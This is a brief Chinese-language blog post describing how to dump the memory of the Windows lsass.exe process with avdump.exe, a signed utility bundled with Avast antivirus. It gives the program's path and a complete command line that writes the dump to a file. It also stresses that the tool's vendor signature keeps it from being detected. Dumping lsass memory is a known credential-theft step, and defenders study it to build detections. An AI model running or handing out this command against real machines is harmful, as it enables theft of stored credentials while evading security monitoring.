通过Avast杀毒软件自带的程序转储lsass.exe进程

电脑空间不够了打算删掉虚机，打开发现了Avast杀毒软件。

 

 突然想到这个杀软有个程序可以转储进程lsass内存数据，就去搜了下文章复现了一下。

该软件安装后的默认目录：C:\Program Files\Avast Software\Avast\

目录下有一个avdump的程序由于带有avast杀软数字签名，所以不会被检测和查杀。

.\avdump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\1\lsass.dmp

 

 

 

 

原文地址：https://www.archcloudlabs.com/projects/dumping-memory-with-av/